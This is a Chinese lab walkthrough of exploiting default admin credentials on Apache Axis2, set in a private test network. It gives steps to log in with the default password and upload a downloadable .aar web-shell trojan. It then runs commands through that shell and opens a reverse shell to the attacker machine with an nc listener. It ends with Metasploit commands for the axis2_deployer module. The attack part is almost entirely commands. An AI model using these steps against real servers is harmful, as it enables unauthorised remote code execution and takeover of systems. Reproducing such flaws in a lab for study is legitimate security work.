axis2弱密码漏洞复现

介绍

Axis2 Web 管理模块是一个下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。

环境介绍

主机 IP
靶机 192.168.30.134
kali 192.168.30.128

靶机

链接:https://pan.baidu.com/s/1oz8LrApwYolS2orgJCT8yw 
提取码:1234 

发现漏洞

使用扫描器发现漏洞,发现可以利用
在这里插入图片描述

开始复现

使用admin和默认密码登陆axis2。
在这里插入图片描述
发现漏洞上传点。

在这里插入图片描述
aar木马下载:

链接:https://pan.baidu.com/s/1_z6BQay90_TA1yURO9_z3A 
提取码:1234 

上传木马文件
在这里插入图片描述

执行命令
http://192.168.30.134/axis2/services/Cat/exec?cmd=ifconfig

在这里插入图片描述

反弹shell

使用nc监听端口1111

nc -lvp 1111

在这里插入图片描述
使用命令进行反弹shell

http://192.168.30.134/axis2/services/Cat/shell?host=192.168.30.128&port=1111

在这里插入图片描述
在这里插入图片描述

Meterpreter复现

msfconsole 
use exploit/multi/http/axis2_deployer
msf6 exploit(multi/http/axis2_deployer) > set rhosts 192.168.30.134
msf6 exploit(multi/http/axis2_deployer) > set rport 80
msf6 exploit(multi/http/axis2_deployer) > exploit

在这里插入图片描述

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>